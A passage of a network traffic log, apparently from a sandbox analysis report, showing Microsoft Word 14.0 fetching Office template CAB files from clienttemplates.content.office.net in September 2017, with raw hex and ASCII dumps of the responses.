a5 14 26 98 da 82 68 88 33 a0 d2 04 18 40 43 34 91 0b 01 6f c4 08 fb 00 00 01 00 4d 09 80 19 26 d0 f8 c7 cf 4d 3e 4d 19 42 d4 93 a6 85 31 3d 3c ba e8 b1 11 8d 78 00 02 22 db 00 c1 32 08 a9 60 60 60 82 c0 00 00 01 4a 05 7e 45 34 69 f8 0e 50 d3 00 20 50 00 f1 af 80 04 80 2f 07 7d 8c 8c 2b 6d b5 5f 4c 56 65 6e 68 5a 29 54 62 6d 1e 61 ba 96 24 01 00 94 2f fc 19 fe bd fa 7b 6f fd 01 48 23 64 31 65 44 57 4c 0e 8e 5e 88 2c f4 26 9d 50 99 5f 87 91 48 54 0e d0 29 ef 7e f6 b5 62 ff 74 1f 78 6d c5 ff 9f e4 76 25 5a bc 5a 4e 5b 54 3a 15 de be b0 91 d0 e7 e0 70 7f f6 d7 dd c8 1a 78 a3 f4 f9 ce 7b d6 54 40 d6 79 58 10 b0 2e b3 87 e4 67 dd 87 ae 5c 4e 7f dc 20 c4 b9 ee e7 b2 71 1d 70 ec f4 b0 ed 44 2a ad 1e 99 f6 d4 cb 6e f1 e7 1f 60 58 af 27 c8 ac 53 71 37 9f 65 73 ee f5 38 4b e9 ea e8 71 ed ee 47 e8 26 63 4c e5 Data Ascii: MSCFaDa?\|}Equity.dotx}Content.infg6}`~[.%"ww!vwwvw. 3$PF`l"p&$@jkxle"W= zPtJ.&h3@C4oM&M>MB1=<x"2```J~E4iP P/}+m_LVenhZ)Tbma$/{oH#d1eDWL^,&P_HT)~btxmv%ZZN[T:px{T@yX.g\N qpD*n`X'Sq7es8KqG&cL	1110
Sep 12, 2017 22:18:52.886197090 MESZ	49201	80	192.168.1.16	88.221.14.177	GET /support/templates/en-us/tp01793888.cab HTTP/1.1 X-Office-Version: 14.0.5128 User-Agent: Microsoft Office/14.0 (Windows NT 6.1; Microsoft Word 14.0.5128; Pro) Host: clienttemplates.content.office.net Connection: Keep-Alive Cache-Control: no-cache	1226
Sep 12, 2017 22:18:54.055321932 MESZ	80	49201	88.221.14.177	192.168.1.16	HTTP/1.1 200 OK Content-Length: 22602 Content-Type: application/vnd.ms-cab-compressed Content-MD5: GLcxLaX8Rwyv0pX/JUUeEQ== Last-Modified: Fri, 22 Apr 2016 16:13:54 GMT ETag: 0x8D36AC91A13B9B0 Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0 x-ms-request-id: 0ce34f3b-0001-0028-11d1-6b20de000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Date: Tue, 12 Sep 2017 20:18:53 GMT Connection: keep-alive Data Raw: 4d 53 43 46 00 00 00 00 3a 19 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 02 00 04 00 00 00 00 00 14 00 00 00 00 00 10 00 3a 19 00 00 10 3f 00 00 00 00 00 00 00 00 00 00 82 00 00 00 01 00 03 12 52 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 61 72 63 68 69 74 65 63 74 75 72 65 2e 67 6c 6f 78 00 fc 00 00 00 52 1c 00 00 00 00 00 00 00 00 00 00 43 6f 6e 74 65 6e 74 2e 69 6e 66 00 e5 2b 95 fa b0 18 4e 1d 5b 80 80 8d 01 10 e0 d4 00 00 52 00 50 14 00 00 3f 00 68 e1 c2 5a 5a 91 3b 14 c3 5a 51 a5 5a 61 d1 0e b4 c3 8e 70 d0 22 45 aa 45 08 2d 0a 69 0f 96 68 15 16 2d 68 21 68 b4 50 1c 2d 00 08 0c 09 40 d1 00 00 14 01 c4 2d b3 0c 2b 00 00 8f 2c 82 f0 98 82 15 dc 06 2a e0 1b f0 49 78 03 44 c0 75 98 5d 69 a0 33 20 04 71 15 76 ec 09 37 8a 84 d3 04 dc 22 20 ce 10 2f 01 67 c0 38 11 c4 8b ff 5f 08 e8 00 00 00 00 89 00 01 10 2c 10 a5 ad ab cc 4b 13 54 80 44 79 02 08 0f fb 7f c4 fe ff 41 91 58 34 70 5c e4 0f 6a 6c 22 e1 a7 0b 21 cb 0a b2 37 fd 0e e5 56 80 f3 02 66 68 e0 96 1f 47 6f d2 0a 63 34 40 92 ec f8 81 97 eb 4a 43 0d 8a 3b c4 f5 4e 33 c0 73 6b 5b 33 31 52 d1 71 c9 c1 f4 76 53 33 5b 0b 33 13 27 53 b7 a4 63 88 41 37 06 2e 8a 8e ed a5 51 60 b4 1e 65 6e 6c 66 d7 f6 af f3 7a d2 94 81 86 40 30 c4 9b 40 59 98 07 43 dc 0a d6 70 ec d9 ae bf b5 31 fa b6 8f 40 b6 a8 02 b2 0a 6c d0 c2 90 15 23 30 93 b3 f0 93 bf 4d 46 aa fd 2e b6 53 51 f5 da cb d5 0f 1a dd d8 d8 98 d9 71 43 d8 1a c3 5b 6c fe f5 23 c1 36 fc 7b 51 f7 28 b4 e0 74 4d ae 40 7b 83 f1 62 05 78 da dc bb be 10 0c ce dc 23 f8 3f aa 07 7f 5a 12 e3 e3 da 11 fb 74 ea 2f b6 b6 51 f3 fc a4 af fb 05 83 3e 16 f6 64 bf 3b d4 5d fe f2 7e 10 10 76 7f bf f6 f3 0b 08 81 f7 65 c0 e2 15 d4 a7 99 22 f6 5b 4c a8 42 b5 36 df fa 98 d2 5e 7d 33 20 86 08 67 ff 37 af ad 7c 5e 4c c4 98 ce 70 c9 d8 87 ff 8f d4 c3 4e 31 21 30 b0 a0 30 3c 85 3d 3d 40 40 fb 62 05 2c 01 fc 3f 8a 6b ff 40 89 00 15 0f 68 d2 13 23 42 29 f3 bb 6b a7 30 93 c6 12 f2 8b 7c 3f 5c 08 55 cc fd bf 17 ad 6a 9f cb bf b7 8b e1 9a 6c 95 31 b4 f2 53 b8 2d 13 ab a0 dd 1c 34 d3 2e 13 44 30 8d 45 2f 3c 18 92 f4 5c 24 f8 14 39 0a dd 24 ff 46 16 99 f1 bc 28 53 d6 f3 7e 19 58 32 58 19 e3 06 3f 27 bb 45 b1 7e a5 97 e7 fe 47 71 bf b1 13 33 c7 c0 d2 06 d9 c6 b6 28 c4 a3 d3 99 60 57 77 be 13 93 78 16 f0 76 83 f9 74 db c5 fa 1d 22 5d 41 d7 74 2e 5d 4b 60 4c a8 cb 59 1c 39 d1 b7 11 b6 d9 4c 09 9d d4 69 75 07 b6 db 2c af a4 8b 36 b6 a6 6e 0c 1e 06 6c 2e 99 47 fe 56 d4 3a d3 45 8d a6 10 9d 78 75 ab 0c f2 f0 ee 19 27 90 6c d8 80 f0 a2 b1 e4 33 58 d7 f5 8d 2f c2 ae 5e b4 06 ba 9f bb e2 9a 72 3c d9 94 b6 8c 36 5e f7 d7 4a 11 0a 94 8e f9 03 3a 60 19 fb fb b6 09 a9 bc 1c 1c 56 55 68 93 dd 68 44 0c 17 79 5c 09 b8 69 ab 69 33 89 00 d8 ab 6b 14 08 76 86 7d 7f 95 96 2f f6 a8 56 29 41 d3 74 e9 c7 aa 21 1f 85 f4 a9 77 12 86 72 05 eb d6 c9 09 72 c1 f1 5a cb af 6d 74 0c 30 2f 2e 37 2a 70 79 75 e5 bd 44 87 62 75 38 56 47 1d 1e 65 ca fd 9c e8 bc aa 24 31 1a ed 28 92 97 5f 45 aa 52 10 c9 1f 1d e4 72 87 4d f5 54 f3 87 db 3a a8 4e ea 4b 01 4f ae 3d b9 14 1d 05 d6 02 0f 76 be 2b 35 0d 77 52 47 99 b7 5a f3 c9 81 ec c7 Data Ascii: MSCF:D:?Rarchitecture.gloxRContent.inf+N[RP?hZZ;ZQZap"EE-ih-h!hP-@-+,IxDu]i3 qv7" /g8_,KTDyAX4p\jl"!7VfhGoc4@JC;N3sk[31RqvS3[3'ScA7.Q`enlfz@0@YCp1@l#0MF.SQqC[l#6{Q(tM@{bx#?Zt/Q>d;]~ve"[LB6^}3 g7\|^LpN1!00<==@@b,?k@h#B)k0\|?\Ujl1S-4.D0E/<\$9$F(S~X2X?'E~Gq3(`Wwxvt"]At.]K`LY9Liu,6nl.GV:Exu'l3X/^r<6^J:`VUhhDy\ii3kv}/V)At!wrrZmt0/.7pyuDbu8VGe$1(_ERrMT:NKO=v+5wRGZ	1522
Sep 12, 2017 22:18:54.270572901 MESZ	49201	80	192.168.1.16	88.221.14.177	GET /support/templates/en-us/tp01793890.cab HTTP/1.1 X-Office-Version: 14.0.5128 User-Agent: Microsoft Office/14.0 (Windows NT 6.1; Microsoft Word 14.0.5128; Pro) Host: clienttemplates.content.office.net Connection: Keep-Alive Cache-Control: no-cache	1579
Sep 12, 2017 22:18:55.949743986 MESZ	80	49201	88.221.14.177	192.168.1.16	HTTP/1.1 200 OK Content-Length: 20679 Content-Type: application/vnd.ms-cab-compressed Content-MD5: 2jHwVfA9C4dQQdw8VC1MIg== Last-Modified: Fri, 22 Apr 2016 16:13:56 GMT ETag: 0x8D36AC91B39A5B6 Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0 x-ms-request-id: bb29b8fd-0001-0007-60b8-dda1e4000000 x-ms-version: 2009-09-19 x-ms-write-protection: false x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Date: Tue, 12 Sep 2017 20:18:55 GMT Connection: keep-alive Data Raw: 4d 53 43 46 00 00 00 00 b7 11 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 02 00 04 00 00 00 00 00 14 00 00 00 00 00 10 00 b7 11 00 00 10 3f 00 00 00 00 00 00 00 00 00 00 8f 00 00 00 01 00 03 12 2e 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 63 68 65 76 72 6f 6e 61 63 63 65 6e 74 5f 54 50 31 30 31 37 39 33 39 33 38 2e 67 6c 6f 78 00 16 01 00 00 2e 15 00 00 00 00 00 00 00 00 00 00 43 6f 6e 74 65 6e 74 2e 69 6e 66 00 b9 13 e1 24 20 11 44 16 5b 80 80 8d 01 10 40 64 00 00 52 00 50 14 00 00 3f 00 4a cb 09 4b a5 94 ec 11 a2 a3 9d d6 c2 2a 24 51 91 e4 cf c5 4e 8e 70 70 95 76 a2 5e e9 2a 58 4a 41 4a 83 68 ec 8a 22 2c a2 90 b4 53 d0 5a 61 ed 20 08 06 00 8c 66 00 00 0a 00 da c1 76 51 d7 81 44 20 35 89 c0 d3 24 bb af 4d d6 81 17 78 2d bc 3b 50 0e b4 47 d9 a2 6d a2 6f 7d 22 1d 92 b0 f6 08 9b 41 35 85 52 22 f0 95 f8 98 30 6f 90 78 12 ff 9b 01 ff 00 00 00 00 11 00 00 9a 85 21 eb b5 2a 06 2b 74 46 3c 0f 08 80 88 4d 80 63 62 df 91 c2 df 6a 36 52 19 30 73 80 09 01 2b 5a 60 3b 22 08 02 22 64 16 cf 6f 00 9e 69 d4 00 d1 05 8b 2b cb ec 99 82 31 c2 0d 2e d0 16 38 31 c5 15 59 d0 4f 8f c5 1a 68 31 f3 9f 69 80 9e 79 f6 6c b7 37 2a 93 35 5b e4 4f 9d 9c 15 04 6d d6 d8 71 6c 5f 95 3b 39 63 7b a5 b3 b5 25 2d 17 27 5f 58 2c 6d 3d e7 c6 61 d0 b6 4d 09 d3 38 69 43 9d f7 43 60 b2 02 69 bc eb ac be db 60 c9 b6 54 93 92 79 fe 67 04 1f d5 02 4b 18 ab e1 2e 77 79 c5 28 3f 7f a5 b0 f2 ea 7b f4 59 b8 60 c3 0d ae 88 df df 6f 95 9b 36 c0 c4 6e 92 6d 77 58 05 b3 09 69 7e 2c b7 25 a2 3a 7d ea 4c 34 e0 a3 dd 68 db c8 29 a2 b7 b6 d8 ed 7c 75 aa ea 28 dd 49 dc 31 16 7e 70 1d 95 03 a1 cb c3 44 01 24 10 ee f8 7b 0a 58 1b 49 58 8e f5 92 f4 ab d2 6c 47 d3 c7 7a 65 bc d0 d6 03 7a 88 9f 8e 92 7b eb 94 d6 af 6d 8c 5b 7b 22 77 3d d0 fa 8d c6 c2 97 ab 26 46 45 ec 37 a8 bd 4e 22 bc 22 3c 8f 10 8d 03 69 0a f6 da 77 e7 ac 01 66 6c fb 8f ca 86 15 f5 14 35 7a c4 38 4e 71 15 be 3b 46 8e 2f d6 69 1e e5 47 de a8 87 03 23 d5 b7 1d d7 70 27 80 3b 49 1a 61 1f 3b 2d 52 30 83 f5 18 33 dc 7d 45 48 5c 2e 6c a2 34 55 24 5f a2 85 6e fa fa a1 6a f5 5d b3 67 68 82 d3 73 6c 70 0c 6a 9b bb 8f 68 b2 c1 a7 d2 5b b8 ac 32 03 47 5a cb af 5e 36 5f 4e 7d 08 09 8f 33 0f 29 26 0c fc a4 05 da 77 a8 a3 3e 2e 52 86 0a 18 da 4a e9 4e 9b c2 2a 56 8d b8 96 00 fe 85 15 69 d0 b0 63 53 a1 41 dd 81 7a db 15 d0 92 ea 40 b8 06 86 bb 6c 68 a3 55 41 17 68 3b 8d e9 78 cc 9a bc e5 61 4d a0 6e 66 29 c6 d8 ac c6 65 87 26 ba eb bf 22 95 65 54 e5 1f 02 e9 d9 d2 05 c2 de 58 b0 bf d9 8d ed f6 32 e3 95 1e 5c 2c 5e de d8 d7 8e d8 fb 54 6b 04 b6 62 a9 d1 df a9 27 76 6c 12 4a 51 b7 5b 42 fa 64 70 c1 8f d3 9c 70 7a f6 9c 74 2e 3b 2b ee 81 ee f6 8d b4 86 8d 79 b4 62 66 ec c2 da de 95 7f 70 76 3b 6f 4b d5 39 fa 10 f2 68 9d 47 55 8c d7 fa c0 f2 16 7f 8f d5 8d 5a b1 94 cf 5d 7a 30 db de eb 2f 66 07 89 05 21 9c e3 e7 65 3f 09 54 ca 48 85 a3 6e fd 20 8d 33 b3 16 89 90 c6 7a 6e aa 79 d1 37 c6 02 5a 20 96 e8 ff 35 5a ca 2f 06 a1 1d 85 9b 47 49 79 da b8 d8 ca 33 ec 8c 59 02 f5 3c 17 f8 Data Ascii: MSCFD?.chevronaccent_TP101793938.glox.Content.inf$ D[@dRP?JK$QNppv^XJAJh",SZa fvQD 5$Mx-;PGmo}"A5R"0ox!+tF<Mcbj6R0s+Z`;""doi+1.81YOh1iyl75[Omql_;9c{%-'_X,m=aM8iCC`i`TygK.wy(?{Y`o6nmwXi~,%:}L4h)\|u(I1~pD${XIXlGzez{m[{"w=&FE7N""<iwfl5z8Nq;F/iG#p';Ia;-R03}EH\.l4U$_nj]ghslpjh[2GZ^6_N}3)&w>.RJN*VicSAz@lhUAh;xaMnf)e&"eTX2\,^Tkb'vlJQ[Bdppzt.;+ybfpv;oK9hGUZ]z0/f!e?THn 3zny7Z 5Z/GIy3Y<	1917
Sep 12, 2017 22:18:56.369544983 MESZ	49201	80	192.168.1.16	88.221.14.177	GET /support/templates/en-us/tp01793889.cab HTTP/1.1 X-Office-Version: 14.0.5128 User-Agent: Microsoft Office/14.0 (Windows NT 6.1; Microsoft Word 14.0.5128; Pro) Host: clienttemplates.content.office.net Connection: Keep-Alive Cache-Control: no-cache	1976
Sep 12, 2017 22:18:58.127057076 MESZ	80	49201	88.221.14.177	192.168.1.16	HTTP/1.1 200 OK Content-Length: 20441 Content-Type: application/vnd.ms-cab-compressed Content-MD5: ZxTT0oDQniAd4v36HDBQ/Q== Last-Modified: Fri, 22 Apr 2016 16:13:55 GMT ETag: 0x8D36AC91AA6FDE2 Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0 x-ms-request-id: 1a9b1955-0001-0023-02d5-6b38aa000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Date: Tue, 12 Sep 2017 20:18:57 GMT Connection: keep-alive Data Raw: 4d 53 43 46 00 00 00 00 c9 10 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 02 00 04 00 00 00 00 00 14 00 00 00 00 00 10 00 c9 10 00 00 10 3f 00 00 00 00 00 00 00 00 00 00 81 00 00 00 01 00 03 12 7a 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 42 72 61 63 6b 65 74 4c 69 73 74 2e 67 6c 6f 78 00 fa 00 00 00 7a 14 00 00 00 00 00 00 00 00 00 00 43 6f 6e 74 65 6e 74 2e 69 6e 66 00 01 b5 86 82 40 10 74 15 5b 80 80 8d 01 10 40 57 00 00 52 00 50 13 00 00 4f 00 0a 97 45 82 a3 52 29 27 c2 50 51 42 49 b9 4f 34 12 15 b0 46 dc d8 60 30 37 c6 ca a9 a3 f4 a3 d2 32 c2 99 20 44 17 6e c6 8a 50 10 12 a0 90 c3 8d 5d 34 10 18 03 00 46 33 00 00 05 00 eb 60 bd 20 76 68 05 be 49 c4 9e 75 6c 07 74 83 f4 81 06 9e 0b ef 0f 54 d1 ba 59 3b 5d 07 6e 62 8d 88 68 f6 b6 6e ef 12 69 13 21 46 c4 17 43 88 22 14 1d 78 4f e2 7f 13 e0 ff 00 10 00 00 03 00 50 33 40 05 5f db ba 5a d5 48 09 a6 04 11 a0 f8 7a 81 c7 cb df 4b f0 ef a6 9e 18 bb 7e 68 98 01 00 07 8b 30 69 d2 a8 a7 f4 ef 26 90 01 40 ee 1b c0 32 00 66 14 63 91 1d 3b b4 70 4b 80 36 45 e3 8c b7 88 d6 c6 0e b5 21 21 29 a5 c9 0e a1 2a 13 2c 02 97 1f 0e 3f a4 b6 f6 cd 85 d9 cc 57 74 e6 4c 1b a0 eb bd f0 b4 d0 91 bd 63 9c 57 8f 7d 6c a6 9b f4 f5 0b f9 6e 4e 7b f6 f7 b6 82 68 53 29 9f 35 a0 23 ce db 5b 88 be 10 27 27 e9 a7 c0 da dd cb 3a d5 27 16 d2 fc 58 5a 7e 1d ee 7a 08 af d4 26 19 4b 45 93 f8 d4 bc 5e 16 e4 d5 67 e8 8a 08 82 3b ec 44 d9 9b c1 76 29 76 08 a4 03 f7 ba a8 0c 04 86 39 e5 0b 2c 5a 48 f3 92 82 ea 38 a6 72 ab 23 0c d3 4b 59 aa 0e dd ec bf d5 c2 a2 d6 f3 8d 96 12 93 90 f9 ab ee 01 71 8b 33 17 f7 b1 98 b8 a2 36 0a 31 9d a4 b5 42 ea 85 3c 23 26 d5 37 80 3a 55 64 c3 a3 4f Data Ascii: MSCFD?zBracketList.gloxzContent.inf@t[@WRPOER)'PQBIO4F`072 DnP]4F3` vhIultTY;]nbhni!FC"xOP3@_ZHzK~h0i&@2fc;pK6E!!)*,?WtLcW}lnN{hS)5#['':'XZ~z&KE^g;Dv)v9,ZH8r#KYq361B<#&7:UdO	2320
Sep 12, 2017 22:18:58.341353893 MESZ	49201	80	192.168.1.16	88.221.14.177	GET /support/templates/en-us/tp01790491.cab HTTP/1.1 X-Office-Version: 14.0.5128 User-Agent: Microsoft Office/14.0 (Windows NT 6.1; Microsoft Word 14.0.5128; Pro) Host: clienttemplates.content.office.net Connection: Keep-Alive Cache-Control: no-cache	2374
Sep 12, 2017 22:18:59.903815985 MESZ	80	49201	88.221.14.177	192.168.1.16	HTTP/1.1 200 OK Content-Length: 254143 Content-Type: application/vnd.ms-cab-compressed Content-MD5: 5ZNQ0bG7oR2q/1MZ1K/DSw== Last-Modified: Fri, 22 Apr 2016 16:13:47 GMT ETag: 0x8D36AC916025546 Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0 x-ms-request-id: 1a9b1b23-0001-0023-37d5-6b38aa000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Date: Tue, 12 Sep 2017 20:18:59 GMT Connection: keep-alive Data Raw: 4d 53 43 46 00 00 00 00 af a1 03 00 00 00 00 00 4c 00 00 00 00 00 00 00 03 01 02 00 02 00 04 00 00 00 00 00 14 00 00 00 00 00 10 00 af a1 03 00 10 3f 00 00 00 00 00 00 00 00 00 00 83 00 00 00 09 00 03 12 93 a0 03 00 01 00 03 12 2b 1f 04 00 00 00 00 00 00 00 00 00 00 00 00 00 4d 79 6c 61 72 2e 74 68 6d 78 00 00 01 00 00 00 00 00 00 01 00 00 00 00 00 00 00 43 6f 6e 74 65 6e 74 2e 69 6e 66 00 c2 ba 34 f0 38 5e 00 80 5b 80 80 8d 06 10 c0 5e 00 00 42 00 00 13 00 00 4f 00 22 8d 24 69 d5 20 92 14 5f 48 c4 78 52 a9 55 5a 26 14 78 a9 8b 97 f1 c6 54 b0 14 a1 90 42 49 d2 6f 24 c3 97 62 7c 48 53 8b 37 52 c6 36 f1 c6 0c 70 db 99 82 a2 a2 00 b8 00 00 86 33 32 f7 dd f1 52 ce 73 e6 13 92 12 21 fc f6 b4 2d b2 27 da 8a 6d 84 43 b2 22 6d 62 6f 71 43 67 24 23 ac c9 be 5f 22 83 6d dc 3d 3f a3 43 6c b4 bf 75 85 6c 04 b6 12 8f a1 2b 58 23 d0 46 68 8d c0 14 f8 2a c8 85 5f e4 32 3f 61 20 fc 00 00 00 00 44 22 05 50 dd 40 b6 cc ad a0 66 f6 d1 ea 44 04 11 01 17 05 57 c0 22 e2 0f 20 bf 7f e0 df 5b 08 d3 c5 4d 33 81 29 86 b1 c1 80 c5 a9 57 25 f2 6c db 85 31 7a 30 30 37 c1 c7 f8 2e 9f 63 32 6f 5b 73 6e fc 67 bb 90 77 f7 77 06 1e 2e 33 c0 27 6f d8 51 32 34 f5 d6 0c cc 3f 8c d7 9f ff e3 89 e0 08 5e b3 fe e6 a3 6b e3 80 0b 61 99 44 df 4a b0 f4 d9 5e c9 ad 0c 40 ee 99 66 6c a8 5c 7c 48 02 37 b4 a2 1d 20 af 3c 3a 13 7b d7 3e b2 8f a8 c9 99 a8 56 c6 d8 55 b4 b7 5c 52 6a c1 5f ad 19 66 7a 2b 75 90 e3 1c 41 4d 47 e4 aa 2b fd 32 b2 c8 5f 6c 95 4a 59 53 60 be 9b d6 24 a6 43 53 6f 79 f8 b1 9b d4 fb 04 07 53 d4 65 7e 18 96 83 ee 6b ad f7 59 c9 a0 d8 b4 eb 46 5a d6 14 47 73 f8 23 ce b8 4b 44 d2 d4 9d 17 07 1a b2 b5 f1 5f b9 be b0 a2 f4 b5 8a 6a 98 a1 84 9c 93 d4 55 e2 a6 d1 bb 3e d6 f6 3a d2 ea fd 82 51 bb bb 36 f6 d7 92 9b 8a bd 47 b2 22 cc 86 77 f5 d4 75 35 b4 d4 09 87 a8 46 f1 80 ee 76 eb ea da c6 e0 7b 52 f1 9e 94 93 bb 05 53 e5 6a c9 6e 0d 2e cd 81 c3 5e ab 16 f8 13 dd fd b6 3b c2 3e 19 17 c7 a2 8d 62 9a 9a 87 4a d3 d5 60 d0 66 b4 71 16 97 35 b9 6a 64 f9 ad 2f af 6d d0 07 a7 d8 ca 08 d6 75 7a dd b4 a8 e5 72 fb 9a a3 77 b6 2c 3c f7 be c1 91 55 b5 e9 35 b0 ae 6b 0a fa 82 02 9f c4 8f 66 d6 c2 cb f8 cd e7 13 20 38 67 1a cb 6e f0 35 3c a9 45 99 52 c3 bc 1f 02 49 bf e6 db 38 0f 22 14 0c 6c 4c 2a 5e 20 35 7e 70 5c b9 6f 2d 80 57 1d 6e 83 1d 0f f7 8e 66 3b b0 10 ad 6f 2d e5 c5 67 af 55 59 b6 6a ed 56 7c a0 1b 6f 32 c6 57 bf 83 af 33 e0 fe 30 5b fa 14 ad c3 e9 ff e3 18 62 92 fd 1f c7 2f 88 9f 29 e4 92 b0 97 99 fe e9 d9 dc 0d a6 99 ea 68 b9 f1 8b 94 4a 7d b7 1e 1a a9 96 a9 bd b4 4e 56 9d a3 00 64 1e fe 13 db cc 0b b7 06 89 7f aa 70 6f 89 79 41 c4 1f 3c 3a dd a7 63 52 25 45 09 f9 ee 24 a1 b0 28 f7 ed 7b bf 94 8b 21 a5 79 e5 6d 64 33 32 9b c2 e5 bb a8 f5 75 ce cc 52 6a 73 3b 4d 68 16 ff 85 87 89 b0 74 38 f2 62 2f 1c 72 56 9d 85 4b 33 4d 6e 93 19 3b f6 07 1c 59 99 3d 44 11 6f 7b b7 d6 da ac c6 3e 44 c6 6b 3a 5f 8a 6d c7 3e d0 64 b7 36 66 ba 98 4a 9c f1 bf 37 b3 05 d7 49 00 23 a7 e7 c6 1a 6e ff 6b 0a 58 50 e0 66 19 07 b3 ce ee b6 cb a5 e7 9d 46 0f e0 99 4c ab c5 18 39 62 27 6e 5e d9 2f 3c c0 3a ba 39 2b 7a a0 3c 78 Data Ascii: MSCFL?+Mylar.thmxContent.inf48^[^BO"$i _HxRUZ&xTBIo$b\|HS7R6p32Rs!-'mC"mboqCg$#_"m=?Clul+X#Fh_2?a D"P@fDW" [M3)W%l1z007.c2o[sngww.3'oQ24?^kaDJ^@fl\\|H7 <:{>VU\Rj_fz+uAMG+2_lJYS`$CSoySe~kYFZGs#KD_jU>:Q6G"wu5Fv{RSjn.^;>bJ`fq5jd/muzrw,<U5kf 8gn5<ERI8"lL^ 5~p\o-Wnf;o-gUYjV\|o2W30[b/)hJ}NVdpoyA<:cR%E$({!ymd32uRjs;Mht8b/rVK3Mn;Y=Do{>Dk:_m>d6fJ7I#nkXPfFL9b'n^/<:9+z<x	2650
Sep 12, 2017 22:18:59.965039015 MESZ	49202	80	192.168.1.16	88.221.14.177	GET /support/templates/en-us/tp01790490.cab HTTP/1.1 X-Office-Version: 14.0.5128 User-Agent: Microsoft Office/14.0 (Windows NT 6.1; Microsoft Word 14.0.5128; Pro) Host: clienttemplates.content.office.net Connection: Keep-Alive Cache-Control: no-cache	2655
Sep 12, 2017 22:19:01.568209887 MESZ	80	49202	88.221.14.177	192.168.1.16	HTTP/1.1 200 OK Content-Length: 132345 Content-Type: application/vnd.ms-cab-compressed Content-MD5: e3qksEL8lYYlOjjo3fUlOA== Last-Modified: Fri, 22 Apr 2016 16:13:46 GMT ETag: 0x8D36AC915503D77 Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0 x-ms-request-id: 1b91a7ed-0001-003c-4d7b-6be3ba000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Date: Tue, 12 Sep 2017 20:19:00 GMT Connection: keep-alive Data Raw: 4d 53 43 46 00 00 00 00 e9 c5 01 00 00 00 00 00 4c 00 00 00 00 00 00 00 03 01 02 00 02 00 04 00 00 00 00 00 14 00 00 00 00 00 10 00 e9 c5 01 00 10 3f 00 00 00 00 00 00 00 00 00 00 85 00 00 00 05 00 03 12 17 c5 01 00 01 00 03 12 1a 65 02 00 00 00 00 00 00 00 00 00 00 00 00 00 44 65 63 61 74 75 72 2e 74 68 6d 78 00 04 01 00 00 00 00 00 00 01 00 00 00 00 00 00 00 43 6f 6e 74 65 6e 74 2e 69 6e 66 00 cb b0 30 a6 22 6f 00 80 5b 80 80 8d 0b 10 c0 5b 00 00 03 00 00 13 00 00 28 00 51 63 a8 b1 b6 c1 aa aa 66 a8 55 a3 55 55 54 55 18 3e 35 6a 55 53 55 55 e8 31 55 35 55 55 e1 50 0b c3 a2 19 bc a2 00 00 02 00 77 c0 92 99 b8 7d fb 90 48 39 29 5b 9e 13 65 26 36 f0 95 d8 44 b5 c4 d5 a8 4d ec 27 16 45 0e 59 24 e1 88 bd ee 47 2f 4a 42 72 ec 4f 9c 4a f0 64 05 b2 21 72 81 8d 42 5a 12 bb be 31 66 04 5b 05 12 05 a1 94 49 7c 5f e2 88 fd 00 00 00 00 8c 00 01 d0 2d 0c 29 3a f3 06 f8 60 0e 10 72 05 7f 47 7c 7f 61 1f 10 f8 89 a9 61 01 60 9e d0 80 18 8f ec 42 f9 66 68 da e7 c4 28 54 40 48 e0 46 f6 7f ff 02 05 b7 a0 2b b5 b5 30 38 35 ff 41 6d b1 d5 bd 85 b5 64 a5 d1 8a a0 30 60 9e 28 20 58 23 28 cd fe af 7e e3 ef 52 56 4b df cf fc 49 fc a2 3d 55 b3 51 ac 32 69 d0 78 16 9c e5 d0 ab 53 e4 57 76 38 6a 8f 88 3b ad 99 9d 59 41 f6 19 df d9 a2 a5 2b 39 df c5 b7 71 07 51 de dd 3c ea ac 91 52 cb 0b 68 45 48 a9 ed c1 bb 06 0a ec c0 f8 d7 a3 af df 9c f2 db 80 45 85 1f 5c 28 8a 8b 2a c7 f7 5a b4 ee 44 f3 6b 1d b0 32 e9 04 53 c6 e0 92 9a ed 88 89 73 9a cd fb aa 0d 97 07 54 e1 48 2f 98 7b 7c e6 25 19 67 6e 05 67 ac 68 18 61 1e 59 36 a0 89 c7 bd 4c 6a 28 72 43 ae a1 20 4f b9 1d 5f 23 b4 f0 ba 32 57 02 64 fb 71 dc 4b 0e 39 19 62 98 64 de 27 20 6f 66 24 71 c5 c2 18 05 b3 61 d5 b5 a3 42 d1 72 a9 06 a9 de a4 08 75 40 de ef c4 fc db 22 5b 61 95 7d 30 ae 3b be 29 a9 f5 94 8a 12 e9 5b 0f 22 8e 03 35 19 d0 44 25 6a d3 94 73 43 63 95 72 08 1d 87 3c a2 1b ca 3a 58 76 68 5d 41 33 30 37 c5 e1 92 71 e5 da 93 b9 77 ac 09 f6 60 6a fc 2c 73 c9 ed 21 59 ac ce 19 b5 56 26 6d e6 3b b4 c3 1d b7 09 1c 26 d0 0e 87 00 6a 3d a7 54 1a 50 10 a3 78 21 f4 52 35 ed 83 7d f6 24 36 97 25 b6 d5 24 39 43 38 3c 48 f6 5c 85 e9 08 fe 7a 71 ab 4b eb 58 de 56 79 1e 9a f2 e1 3e cf 5b 43 d2 9a a5 e4 2f 16 ea f1 ac b8 3d f7 e1 02 9f 58 3e 0e a9 cd c9 a5 80 e3 c8 67 ea d6 ab b6 f9 7d 64 be de 2d 01 90 31 d3 80 fd cb df 35 a8 5f 47 58 74 f8 40 c8 8b ec e5 8a fc 08 42 02 01 bf f3 1f b6 e5 16 e6 f2 86 df e2 09 f4 8c a8 70 24 0f b3 d7 25 f5 13 0c 9a 8c 7d 48 93 a6 af 94 a1 d3 bb 45 ce c7 f0 1b 